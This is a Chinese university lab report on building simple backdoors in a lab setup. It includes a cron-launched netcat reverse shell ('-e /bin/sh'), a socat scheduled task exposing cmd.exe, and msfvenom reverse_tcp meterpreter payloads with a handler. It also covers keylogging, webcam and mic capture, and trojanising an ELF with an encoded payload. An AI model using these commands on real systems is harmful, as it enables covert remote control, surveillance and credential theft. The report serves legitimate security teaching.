《网络对抗技术》Exp2 PC平台逆向破解之“MAL_简单后门” Week4
一、实验内容
本次实验对象为名为pwn1的pwn1的linux可执行文件。程序正常执行流程是:main调用foo函数,foo函数会简单回显任何用户输入的字符串。
该程序同时包含另一个代码片段,getShell,会返回一个可用Shell。正常情况下这个代码是不会被运行的。我们实践的目标就是想办法运行这个代码片段。我们将学习两种方法运行这个代码片段,然后学习如何注入运行任何Shellcode。
实验分为五部分:
1、使用netcat获取主机操作Shell,cron启动 ;
2、使用socat获取主机操作Shell, 任务计划启动 ;
3、使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell;
4、使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权;
5、可选加分内容:使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell。
二、实验步骤
步骤一:使用netcat获取主机操作Shell,cron启动
1、在本机的Windows下载netcat后,双击运行。打开命终端,输入
ncat.exe -l -p 5214
,对5214号端口进行监听。2、在kali虚拟机中打开终端,输入
crontab -e
来添加一条定时任务,其中-e
表示编辑。第一次编辑时会提示选择编辑器,选择3。在最后一行加入39 * * * * /bin/netcat 172.20.10.4 5214 -e /bin/sh
(ip地址为正在监听的windows 的ip),保存并退出。这样,系统在每个小时的52分钟都会执行该指令。3、等待系统的39分到达后,可以看到已经连接上了。在Winodws的命令行中输入
ls
,可以看到linux当前目录下的文件。
步骤二:使用socat获取主机操作Shell, 任务计划启动
1、在Wiondws中搜索
任务计划
,在弹出的窗口点击创建任务
,填写任务名,在任务
栏下选择socat.exe的路径,然后在参数栏填写tcp-listen:5214 exec:cmd.exe,pty,stderr
后,点击确定。在列表中右键选中刚刚创建的任务,点击运行。2、在linux的终端输入
socat - tcp:192.168.199.235:5214
(这里说明一下,我的实验并不是一次性完成了,中间换了一些网络连接,所以IP地址发生了变化)3、进行调试。由于编码方式不同,所以我们只能在命令行中对英文名字的文件进行操作。进入E盘的XAMMP目录:
步骤三:使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
1、在linux中输入
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.110.129 LPORT=5214 -f exe > meter_backdoor.exe
(这里老师给的指导里头有一个地方打错了,就是LPORT打成了'PORT)生成BackdoorOf5214.exe。2、在linux下输入msfconsole进入控制模式
3、输入
use exploit/multi/handler
4、输入
set payload windows/meterpreter/reverse_tcp
6、输入
show options
进行查看7、输入
set LHOST 192.168.110.129
8、输入
set LPORT 5214
9、输入
show options
再次进行查看,可以看到相应的ip地址和端口号已经变成我所设置的。10、输入
exploit
11、把BackdoorOf5214.exe发送主机上(预先关闭防火墙),然后双击打开,成功连接上:
12、输入dir进行查看
步骤四:使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
在第三步的基础上来实现以下功能
1、输入
record_mic
录音2、输入
keyscan_start
开始记录键盘输入,再输入keyscan_dump
查看3、输入
webcam_snap
拍照4、输入
webcam_stream
摄像
步骤五:可选加分内容:使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell
刚看到这个题目的时候首先冷静一下,从哪里入手呢?仔细回想,在老师给的实验指导书中,在刚提到meterpreter的时候:
msfvenom -p windows/meterpreter/reverse_tcp -x ./KiTTYPortable.exe -e x86/shikata_ga_nai -i 5 -b ‘\x00’ LHOST=192.168.20.136 LPORT=443 -f exe > KiTTy_backdoor.exe
-p 使用的payload。payload翻译为有效载荷,就是被运输有东西。这里windows/meterpreter/reverse_tcp就是一段shellcode
也就是说,我们是否可以改编这条命令来实现我们想要的功能呢?试一试。
首先,-p参数是有效载荷。后面跟的是windows。我们的pwn1是只能在linux下运行的,所以这个地方肯定要改;接着再往后看,-x是指定模板。我们要生成跟pwn1功能一样的、但是有后门的代码,所以模板修改为pwn1;再往后,-e问题不大,因为我们确实是要用x86来解决问题,x86后面一串看不懂,先不管,继续往后;-i,-b应该没问题,先不管;ip和端口分别修改成kali的ip和5214;-f是文件类型。linux中可执行文件类型是不能直接看到的,在命令行输入file pwn1
,得知类型是elf,所以这个地方也要修改,最后输出的文件形式也要跟着修改。于是我进行第一次修改
- 1、修改ip地址和端口
- 2、将windows改成linux,回车确认
- 3、exe改成elf,最后生成的文件改成pwn2
修改完毕后回车,报错:
发现是类型不对。上网搜一下“msf的载荷类型”,可以知道在-p的后面应当是linux/x86......
,修改后再回车,这次没报错。
接下来进行测试。为了方便,我直接kali对kali进行测试。先按步骤三的过程进行监听,然后运行pwn2,发现连接上了,实验成功。
三、遇到的问题
1、在第一个任务中的修改crontab中,提示crontab的规则不正确
解决方法:首先是反复查看输入的代码,没发现错误。于是上网查找,后来发现是数字后面的四个*中间是有空格的。加入空格后解决了问题。
2、前几天还可以上网,今天忽然上不了网。
解决方法:输入
ifconfig -a
,查看网卡的状态,发现eth0网卡罢工了。进入/etc/network/interfaces
,在最后加入auto eth0
和iface eth0 inet dchp
后重启网络,解决了问题。3、本次实验我还遇到了一个问题,最让我高兴的也是解决了这个问题:第三步在同一台计算机上虚拟机和本机连接是可以成功的;如果使用两台计算机的话(A是kali,B是另一电脑),在B双击后门程序是连接不上A的。
解决方法:通过仔细观察,我发现本机连接的话,所显示的连接地址是VMnet8的地址,也就是NAT模式的地址。我尝试着在本机上把VMnet8的适配器给关闭了,然后再双击打开后门程序,这时候就无法连上了。这不禁引起了我的思考,我无法在另外一电脑B上连接是不是跟这有关呢?我尝试着把虚拟机的网络连接方法换成“桥接模式”,这时候再用B去连接A,成功了。
四、基础问题问答
- 1、例举你能想到的一个后门进入到你系统中的可能方式?
- 答:下载了盗版软件,被植入后门;点击了钓鱼网站,被植入后门。
- 2、例举你知道的后门如何启动起来(win及linux)的方式?
- 答:win开机自启动、用户手动开启。linux有实验过程中是利用了crontab来定时向攻击方连接,使用反弹连接的方式。
- 3、Meterpreter有哪些给你映像深刻的功能?(做完实验之后再回来答的这道题)
- 答:摄像功能和键盘输入功能。。摄像功能可以知道用户在干什么。键盘输入功能从某种程度上可以窃取用户的信息,很有可能在用户输入账号、密码时被记录下来。
- 4、如何发现自己有系统有没有被安装后门?
- 答:安装杀毒软件,对电脑进行查杀。
五、心得体会
本次实验更加贴近了我们的生活,不禁感到惶恐。。说不定以前我的电脑已经被入侵过无数回了,只是自己一直不知道而已。而这些内容在世界上知道的人也是少数。看来信息安全确实很重要。。掌握了攻击的方法无异于掌握了一个强大的武器,厉害的话可以来去无踪,俨然网络神偷。